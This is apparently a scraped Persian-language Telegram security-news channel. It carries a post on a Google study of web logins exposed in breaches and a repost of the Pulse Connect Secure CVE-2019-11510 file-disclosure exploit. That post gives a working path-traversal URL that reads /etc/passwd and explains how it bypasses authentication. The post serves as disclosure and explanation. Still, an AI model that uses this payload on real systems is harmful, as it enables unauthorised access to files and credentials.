امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
نتایج یک مطالعه در گوگل نشان میدهد 1.5 درصد لاگین های انجام شده در فضای وب در معرض خطر انتشار در حملات هکرها هستند.
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.


https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/


#google
#news
#privacy


@sec_nerd
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
pulse secure directory traversal bug explained-

/dana-na/ <- "na" means "no authentication", urls not starting with this require login

".." <- duh

"/dana/html5acc/guacamole/" <- if this appears in URL *path*, disables code that would normally check file extension



#pulse
#vpn
#exploit


@sec_nerd